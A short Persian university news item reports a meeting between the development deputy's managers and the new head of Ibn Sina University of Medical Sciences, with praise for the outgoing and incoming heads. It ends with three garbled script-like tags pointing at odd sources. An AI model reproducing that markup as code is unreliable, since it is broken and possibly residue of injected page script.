دیدار معاون و مدیران توسعه با سرپرست جدید دانشگاه

مهندس رحیمی به همراه مدیران حوزه معاونت توسعه با ریاست جدید دانشگاه دیدار کردند.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه به نقل از پایگاه خبری وب‌دا در همدان، در این دیدار مهندس رحیمی ضمن قدردانی از تلاش‌ها، پیگیری‌ها و اقدامات ارزنده و شایسته دکتر موسوی بهار در مدیریت دانشگاه علوم پزشکی ابن سینا بر انتخاب شایسته جانشین وی از سوی وزارت بهداشت تأکید کرد.

وی با اشاره به لزوم تداوم مسیر توفیقات گذشته بر ایجاد تحولات جدید در سایه تدابیر و شیوه های نوین مدیریتی دکتر حیدری مقدم تأکید کرد و افزود: توانمندی های دکتر حیدری مقدم در عرصه های مختلف مدیریت در سیستم دانشگاه به اثبات رسیده است و امید است بتوان در سایه تجارب و تخصص او قله های رفیع موفقیت دانشگاه را در عرصه های ملی و جهانی سریعتر طی کرد.

مهندس رحیمی در ادامه به آمادگی تمام قد معاونت توسعه کمافی سابق در پیشبرد اهداف دانشگاه اشاره و بیان کرد: با هماهنگی و توانمندی که در مجموعه مدیران و کارکنان دانشگاه وجود داشته و دارد می توان به شاخص های عالی و بلند موفقیت در سطح کشور دست یافت.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>